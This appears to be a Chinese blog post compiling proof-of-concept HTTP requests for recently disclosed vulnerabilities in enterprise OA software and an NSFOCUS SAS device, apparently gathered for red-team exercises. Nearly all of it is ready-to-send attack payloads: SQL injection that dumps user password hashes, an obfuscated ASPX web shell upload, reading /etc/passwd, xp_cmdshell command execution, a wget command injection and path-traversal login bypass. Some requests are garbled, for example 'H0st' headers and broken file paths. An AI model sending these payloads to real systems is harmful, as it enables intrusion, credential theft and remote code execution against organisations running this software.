HW情报-2023年8月11日-1day汇总
登录
侧边栏壁纸
博主昵称
月影

  • 累计撰写 85 篇文章
  • 累计收到 101 条评论
漏洞

HW情报-2023年8月11日-1day汇总

月影
月影
2023-08-11 / 0 评论 / 14 阅读 / 正在检测是否收录...

广联达oa sql注入漏洞 POC


POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

广联达oa 后台文件上传漏洞 POC

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: 10.10.10.1:8888
X-Requested-With: Ext.basex
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept: */*
Origin: http://10.10.10.1
Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
Cookie: 
Connection: close
Content-Length: 421

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text

<%@ Page Language="Jscript" Debug=true%>
<%
var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
var GFMA=Request.Form("qmq1");
var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
eval(GFMA, ONOQ);
%>

------WebKitFormBoundaryFfJZ4PlAZBixjELj--

通达OA(CVE-2023-4166)

描述-影响范围
通达OA
是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是适合各个行业用户的综合管理办公平台
本次范围:通达OA版本11.10之前

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 192.168.232.137:8098
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46
Upgrade-Insecure-Requests: 1

泛微 Weaver E-Office9 前台文件包含

http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls

蓝凌oa前台代码执行

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:www.ynjd.cn:801
User-Agent:Mozilla/4.0 (compatible;MSIE 8.0;Windows NT 6.1)
Accept:
Connection:Keep-Alive
Content-Length:42
Content-Type:application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}

泛微某版本sql注入

POST
/dwr/call/plaincall/CptDwrutil.ifNewsCheckoutByCurrentUser.dwr
HTTP/1.1
Host:ip:port
User-Agent:Mozilla/5.0 (Windows NT 5.1)AppleWebKit/537.36
(KHTML,like Gecko)Chrome/35.0.2117.157 Safari/537.36
Connection:close
Content-Length:189
Content-Type:text/plain
Accept-Encoding:gzip
callCount=1
page=
httpSessionId=
scriptSessionId=
c0-scriptName=DocDwrutil
c0-methodName=ifNewscheckoutByCurrentUser
c0-id=0
c0-param0=string:1 AND 1=1
c0-param1=string:1
batchId=0

金和oa c7-getsqldata.aspx sql注入

POST /C6/Control/GetSqlData.aspx/.ashx
Host:ip:port
User-Agent:Mozilla/5.0 (Windows NT 5.1)AppleWebKit/537.36
(KHTML,like Gecko)Chrome/35.0.2117.157 Safari/537.36
Connection:close
Content-Length:189
Content-Type:text/plain
Accept-Encoding:gzip

exec master.xp_cmdshell 'ipconfig'

绿盟sas交换机EXEC远程命令执行漏洞

GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1
H0st:1.1.1.1
User-Agent:Mozilla/5.0 (Macintosh;Intel Mac OS X 10_14_3)
AppleWebKit/605.1.15 (KHTML,like Gecko)Version/12.0.3
Safari/605.1.15
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip,deflate
Connection:close

绿盟sas交换机GetFile任意文件读取漏洞POC

GET /api/virtual/home/status?
cat=../../../../../../../../../../../../../../usr/ocal/nsfocus/w
eb/apache2/www/Local_user.php&method=login&user_account=admin
HTTP/1.1
H0st:1.1.1.1
User-Agent:Mozilla/5.0 (Macintosh;Intel Mac OS X 10_14_3)
AppleWebKit/605.1.15 (KHTML,like Gecko)Version/12.0.3
Safari/605.1.15
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip,deflate
Connection:close

local_user..php任意用户登录漏洞POC

GET /api/virtual/home/status?
cat=../.././../././.././../.././.././../usr/几ocal/nsfocus/w
eb/apache2/www/local_user.php&method=login&user_account=admin
HTTP/1.1
H0st:1.1.1.1
User-Agent:Mozilla/5.0 (Macintosh;Intel Mac OS X 10_14_3)
AppleWebKit/605.1.15 (KHTML,like Gecko)Version/12.0.3
Safari/605.1.15
Accept-Encoding:gzip,deflate
Connection:close
0
暂无标签
版权属于: 月影
本文链接: http://47.100.127.167/index.php/archives/669/
作品采用: 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 》许可协议授权

评论 (0)

取消